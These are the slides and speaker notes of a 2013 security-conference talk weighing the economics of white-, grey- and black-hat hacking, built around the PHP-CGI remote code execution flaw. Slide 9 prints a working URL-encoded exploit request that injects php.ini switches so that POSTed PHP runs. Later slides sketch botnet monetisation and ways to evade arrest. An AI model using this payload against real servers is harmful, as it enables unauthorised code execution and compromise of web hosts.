More Related Content


Defcamp 2013 - Does it pay to be a blackhat hacker

  1. DOES IT PAY TO BE A BLACKHAT HACKER? DefCamp Romania – November 29, 2013 Speaker: Dan Catalin VASILE
  2. About me • Information Security Consultant • OWASP Romania Board Member • InfoSec Researcher / Writer / Presenter
  3. Agenda • • • • What is a hacker? Different types of hats A real world vulnerability Exploitation – White – Grey – Black • Gains and risks • Conclusion
  4. What is a hacker? Original definition (MIT 1960s & RFC 1392) A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. Main-stream media definition & general public acceptance (also in RFC 1392) Mass media and general public's usage of the word hacker refers to security breakers motivated mainly by financial gains. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
  5. Different kinds of hats White hat An ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems. Grey hat A skilled hacker whose activities fall somewhere between white and black hat hackers in a variety of practices. Sometimes he acts illegally, though in good will, to identify vulnerabilities in computing processes. Black hat A hacker who violates computer security for little reason beyond maliciousness or for personal gain.
  6. A real world vulnerability Apache Web Server :: remote code execution Where? In the default installation of php5-cgi package. The problem PHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files. Description When the php-cgi receives a processed query string parameter as command line arguments which allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution.
  7. A real world vulnerability Apache Web Server :: remote code execution The vulnerability In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to NULL. STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect, php_cgi_globals_struct, php_cgi_globals) STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString, redirect_status_env, php_cgi_globals_struct, php_cgi_globals) It is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch so that php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary php.
  8. A real world vulnerability Apache Web Server :: remote code execution Impact!!! A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
  9. A real world vulnerability Apache Web Server :: remote code execution Exploitation PoC char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn" "Host: %srn" "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn" "Content-Type: application/x-www-form-urlencodedrn" "Content-Length: %drn" "Connection: closernrn%s"; -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
  10. A real world vulnerability Apache Web Server :: remote code execution Show me the numbers
  11. A tale of three Alice Bob Mallory
  12. What are the options? Responsible disclosure - Let Apache know about the problem - Let them fix it - Allow “some” time for the patch to be installed on most (??) of the systems - Make the public announcement and get the credit - For some cash you can make Google pay for it A list of bug bounties programs:
  13. What are the options? Sell the vulnerability to a broker - TippingPoint's Zero-Day Initiative - iDefense's Vulnerability Contributor Program - Vupen’s Threat Protection Program
  14. What are the options? Exploit it on your own! - Small scale - A few selected targets - Very large scale - Internet size attack Create a botnet of servers
  15. White Hat Alice Employer: big consulting corporation Annual net income: ~$80.000 Approach: - Responsible disclosure Gains: - Fame - ~$3k / reporting the vulnerability Risks: - Mainly risk free
  16. Grey Hat Bob Employer: small web-hosting provider Annual net income: ~$45.000 Approach: - Exploit it on a small scale Sell it to a broker Disclose it anonymously Gains: - No fame, just some fortune $50k from the broker ~$15k / year Risks: - Legal charges for hacking
  17. Black Hat Mallory Employer: self-employed/freelancer Annual net income: ~$20.000 Approach: - Exploit it on a ‘never-seen’ scale Phase 1
  18. Black Hat Mallory Phase 2 Scale? Millions of machines (10+)
  19. Black Hat Mallory Uses for the botnet • • • • • • • • Distributed Denial-of-Service Attacks Spamming Sniffing Traffic Spreading new malware Advertisement services abuse Manipulating pools/games/etc Mass identity theft Many others
  20. Black Hat Mallory DDOS Market price: $200/10k bots/day Mallory’s price? ~200k/day/client Multiple clients He can literally make millions every day.
  21. Black Hat Mallory DDOS Spamhaus DDOS attack When? March 2013 How big? 300Gbps
  22. Black Hat Mallory Risks? Besides being the most wanted cyber-criminal ever?  Going to jail! Side thoughts - He only uses Bitcoins or alternative untraceable payment options - He uses money mules to cash out - The botnet gets divided - He moves to a country with no extradition treaty
  23. Aftermath It takes months (years?) for the Internet to recover after such a breach. Patching, releasing, clean install, removing all the infections is a painfully long process since the botnet tries to reactivate. What was real and what was not? - Apache PHP Vulnerability – REAL - PoC – REAL - the impact – not so real -Black-hat exploitation – science-fiction, yet doable
  24. A tale of three Alice Bob Mallory
  25. Conclusions Are there any? Does it pay to be blackhat? It does. Financially. Only! Do we hunt all blackhats down? Different shades of gray.
  26. Thank you

Editor's Notes

  1. Hi everybody. My name is Dan Vasile and today we’re going to talk about money! More specifically, the economics behind the hacking scenes. We don’t have much time to go over all the aspects, but we should set the ground for a proper understanding of the subject.The whole idea behind this talk is to see if we need to make a change in our careers and change the hats. I am very keen to find out if being on the dark side really pays off and what it takes to be black.
  2. First things first, a little bit about myself. I have to set the proper background here, since I’ve asked the all important question: Does it pay to be black?I am and have been for some time now, a consultant in the InfoSec world. I’m also a board member of OWASP Romania, which is becoming a great place for exchanging information security ideas and not only those related to web applications, but rather all sort of applications. I invite you to join the group and the regular meetings, just search for OWASP Romania and you’ll find us. You’ll also find me with my colleagues at launch time outside the conference room, presenting OWASP projects. Come there for chatting with us.I’ve been involved in information security research, I publish on my blog and I present at conferences. Just like I do now.
  3. This is the agenda of the presentation.